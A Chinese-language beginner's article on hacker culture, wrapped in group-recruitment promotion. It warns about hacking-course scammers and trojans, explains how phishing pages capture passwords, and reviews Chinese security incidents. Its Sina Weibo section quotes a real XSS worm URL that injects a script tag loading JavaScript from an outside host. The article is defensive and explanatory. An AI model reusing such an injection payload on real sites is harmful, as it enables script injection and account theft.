一次性进群,长期免费索取教程,没有付费教程。
ID:Computer-network
很多人认为“黑客”这个词具有贬义,实际上黑客却在推动计算机不断进步方面功不可没,黑客与安全技术密不可分。如果好坏善恶需要明确的词语来划分的话,那么善意的黑客我们称为白帽黑客,恶意的黑客则被称为黑帽黑客。俗话说“攻防不绝对,技术无黑白”,好坏要看使用者自身。
放眼当下,大多数人对黑客的认识还停留在“破坏”与“入侵”等词汇上,造成这种现象的原因,一方面,大众往往无法直接接触黑客群体,仅在影视作品中了解过黑客,殊不知,影视作品多有夸张成分。另一方面,新闻媒体对黑客的报道也略有偏颇,新闻内容有时实在是夸张至极,充斥着添油加醋之后用以吸引眼球的文字。
一、不得不防
对于网络安全以及黑客技术这块领域,很多人往往感到不知所措、前进困难,这时就出现了一些不怀好意的人,利用各种各样的手段欺骗他人,我们现在就来剖析一下这些常见的现象。
1、防范各种骗子
初学者不了解黑客的世界,却又不断尝试接触,这时,不怀好意的人就会乘虚而入,利用初学者对于黑客的不了解,自称黑客高手,说出一些看似高深的名词,骗取初学者的信任,并要求其缴纳“学费”,这种行为与诈骗无异。但由于取证困难,骗子很难得到惩罚,这更加助长了他们的嚣张气焰。
在此,介绍一些识别骗子的方法,各位可以作为参考,或告诉身边对黑客技术感兴趣的初学者,提高警惕,谨防上当受骗。
(1)所谓黑客
很多时候,骗子们会在各种社区、论坛或是社交网站上发布类似于“黑客收徒”的信息,往往伴随着“技术列表”,如图1所示。
图1“收徒信息”
这是一种典型的骗术,可能那些人对所列举的技术仅仅是知道名字而已,有时打出的“特价收徒”则满足了一些人贪图小利的性格,使其上当受骗。除此之外,试想,如果这个人的技术真的如此高深,为什么还会为了几十元钱而到处散布“收徒信息”,张口闭口就是“收钱”呢?真正的技术大牛应该是抓紧时间研究技术,提升自己。另外,想纠正一个普遍存在的认识错误:“盗号”很简单。试想,如果盗号真的如此简单,那让腾讯、阿里巴巴这些大公司的技术人员情何以堪?就算真的有人拥有这样的技术,他也不会为了一些可笑的理由去盗取别人的社交账号的。
(2)不要随意运行不明程序
有一些骗术手段更加隐蔽,以发送“黑客软件”为借口,给没有防备的新手发送木马软件,窃取信息,甚至让你的计算机在无声无息中沦为“肉鸡”(受黑客远程控制的计算机)。
(3)不要被看似“黑客”的东西蒙蔽
很多新手对黑客感兴趣是因为“觉得很酷”,正因如此,骗子们往往会用一些很酷的东西来吸引别人。例如“匿名者”以及“V字仇杀队”,“匿名者”黑客团队给人留下的印象就是“酷”和“神秘”,也难怪很多骗子打着“匿名者”的幌子招摇撞骗了。
还是那句话,真正钻研技术的人是不需要这些表面功夫的。用社交网络上夸张的头像等信息来彰显自己“黑客”身份的人,大多数是骗子或“娱乐圈”人士。
(4)黑客“娱乐圈”
娱乐圈在我们的社会不可或缺,但在网络安全的世界里,这个词就颇有些讽刺意义了。“黑客娱乐圈”本身没有一个准确的定义,一般认为:没有钻研技术的精神,整天考虑如何让自己看起来像黑客,仅会使用一些小工具就沾沾自喜、停滞不前的人就是娱乐圈成员;也经常用来代指以“黑客”为噱头炒作自己的人。
这并不是个例,很多刚进入这个圈子或渴望进入这个圈子的新手都希望追求一些更“酷”的事物,而不是潜心钻研技术。好奇之心人皆有之,希望徘徊在“娱乐圈”的朋友们能看清那些光鲜下的不实,戒骄戒躁,悬崖勒马。
2、防范钓鱼网站
钓鱼网站的存在确实给诈骗活动提供了便利(例如,恭喜您获得了价值×××元的××奖品一类),重点是针对用户账号、密码的钓鱼页面。
为了防范这种钓鱼攻击,最便捷可靠的方法就是留意浏览器URL信息。
那么,在受害者没有意识地进入攻击者的网站之后,下一步攻击又是如何展开的呢?用户的密码信息又是如何神不知鬼不觉地泄露的呢?
攻击者制作的登录页面看起来和真正的登录页面无异,但这个页面的工作原理如下:
(1)受害者输入账号、密码信息。
(2)提示密码错误,后台第一次记录账号、密码。
(3)受害者再次输入账号、密码。
(4)提示密码正确,并跳转到受害者真正想访问的网站,同时后台第二次记录账号、密码。
(5)记录两次输入的密码,发送给攻击者。
这样一来,抱有“我第一次随便输入密码就知道是不是真的”心态的防御方式彻底宣告失败。
回到刚才的那句话:“最便捷可靠的方式就是留意浏览器上的URL信息”,伪装得再精妙的钓鱼页面,URL也有着明显的不同,在登录时留意URL栏,无疑是一种简便高效的防御方式。该方法不能防御XSS覆盖页面攻击,不过无须过于担心,遇到这种攻击的概率实在是可以忽略。
还有一点需要注意的是,有些钓鱼攻击者会用子域名来迷惑用户的眼睛,例如:www.baidu.com.×××.com(假设×××.com为攻击者的网站)。
这就需要我们睁大眼睛,对于要求输入密码的网站多留心,或是观察浏览器提供的信息来发现这些钓鱼页面(一些浏览器会自动判断该网站的真伪)。
二、敲响警钟
1、CSDN事件
21日晚,CSDN发布声明并道歉。据CSDN官方解释,该数据库为CSDN作为备份所用,CSDN在2009年4月之前是以明文保存密码,而泄漏原因不详。
继CSDN的数据库泄漏之后,天涯社区、世纪佳缘、开心网等十余家国内知名网站的近5000万用户信息陆续在网上被人公布,各大社区的信誉也遭受质疑。当然,这次严重的事故同时也提高了国内对网络信息安全的重视。
2、12306事件
3、“天河”超级计算机事件
图2 天河一号漏洞信息
回顾以上列举的3个典型安全事件,其都与密码安全息息相关,也正好对应了密码安全中3个“过不去的坎”:明文存储、撞库(同一密码多用)和弱口令。
4、新浪微博XSS蠕虫事件
让我们来分析一下这个被用来传播XSS蠕虫的URL:
http://weibo.com/pub/star/g/xyyyd”><script src=//www.2kt.cn/images/
t.js></script>?type=update
在访问这个URL时,新浪会对字符串进行处理,结果变成了访问:
http://weibo.com/pub/star.php?g=xyyyd”><script src=//www.2kt.cn/
images/t.js></script>?type=update
由于参数g并没有进行应有的过滤,导致这个来自外部的JS脚本被嵌入页面内。
三、开源理念
“开源”即开放源代码,具有开源特性的软件(包括操作系统),其源代码对所有人开放,任何人均可以修改、使用、再发行这些软件。下面让我们来简单地了解一下开源。
相信大家都听说过GNU基金会基于Linus Torvalds开发的Linux内核创立的GNU/Linux(也称Linux)操作系统,它的许多发行版本例如Debian、Ubuntu、Red Hat等均为基于开源内核的再创作,广为程序员与技术人员所知。
开源代表着自由、高效率和共享。作为程序员、开发人员,可以使用源代码进行二次开发并再发布,也可以对原始开源项目进行拓展,将更改提交回原始代码仓库,使开源软件的特性更多、功能更强大、更易使用,同时提升普通用户的使用体验。这些对开源软件做出贡献的开发者也称为开源者,他们和其他为开源软件做出贡献的人员(例如进行本地化或参与测试的人员)组成了开源社区。近些年随着互联网的高速发展,开源在国内也越来越受欢迎,各类开源社区大量涌现,许多城市都有了当地的LUG(Linux User Group/Linux, Linux用户社组),还有一些类似AOSC(安同开源社区)这样专精于开发自己的开源软件/系统的社区。开源与开发者、使用者是相得益彰的,而它所体现出的自由、共享与探索精神,则与黑客精神在本质是相通的。
CMS(Content Management System)即内容管理系统,随着Web 2.0时代的发展,越来越多的企业、个人在使用CMS建设网站。由于几乎所有CMS都开源,所以很多的CMS漏洞挖掘实际上是基于代码审计,也就是白盒漏洞挖掘。
四、写在最后
黑客的世界五彩缤纷,但又充斥着华而不实的东西,黑客确实看起来很酷,但这酷的背后其实蕴含着十分艰苦的学习过程,希望一蹴而就的人往往会落进不怀好意者的圈套。黑客与安全并不是相对的,他(它)们相辅相成——因为有黑客的探索才会有安全,又正是因为无法做到绝对安全,黑客才有存在的意义。
ID:Computer-network
【推荐书籍】